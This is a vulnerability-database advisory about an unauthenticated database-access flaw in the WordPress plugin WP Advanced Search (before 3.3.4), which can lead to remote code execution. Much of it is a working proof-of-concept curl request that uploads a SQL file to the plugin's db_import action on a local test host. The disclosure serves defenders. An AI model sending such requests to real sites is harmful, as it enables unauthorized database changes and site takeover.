Lucene search

K
wpvulndbWpvulndbWPVDB-ID:F0573253-9DD4-4C73-AA2E-867C9CAAE0DC
HistoryMar 05, 2020 - 12:00 a.m.

WP Advanced Search < 3.3.4 - Unauthenticated Database Access and Remote Code Execution (RCE)

2020-03-0500:00:00
wpscan.com
6

Arbitrary database queries can be executed in an unauthenticated context of the “WP-Advanced-Search Plugin”. E.g. a new administrative account could be added to the WordPress instance, a malicious plugin deployed and therefore Remote Code Execution (RCE) would be possible in the end.

PoC

PoC: Update the admin’s display name curl -i -s -k -X $‘POST’ \ -H $‘Host: 127.0.0.1:8000’ -H $‘User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0’ -H $‘Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8’ -H $‘Accept-Language: en-US,en;q=0.5’ -H $‘Accept-Encoding: gzip, deflate’ -H $‘Content-Type: multipart/form-data; boundary=---------------------------484865952156175792666168121’ -H $‘Content-Length: 302’ -H $‘Connection: close’ -H $‘Upgrade-Insecure-Requests: 1’ \ --data-binary $‘-----------------------------484865952156175792666168121\x0d\x0aContent-Disposition: form-data; name="wp_advanced_search_file_import"; filename="test.sql"\x0d\x0aContent-Type: application/sql\x0d\x0a\x0d\x0aupdate wp_users set display_name="Frycos" where id = 1;\x0a\x0d\x0a-----------------------------484865952156175792666168121–\x0d\x0a’ \ $‘http://127.0.0.1:8000/wp-admin/admin-post.php?action=db_import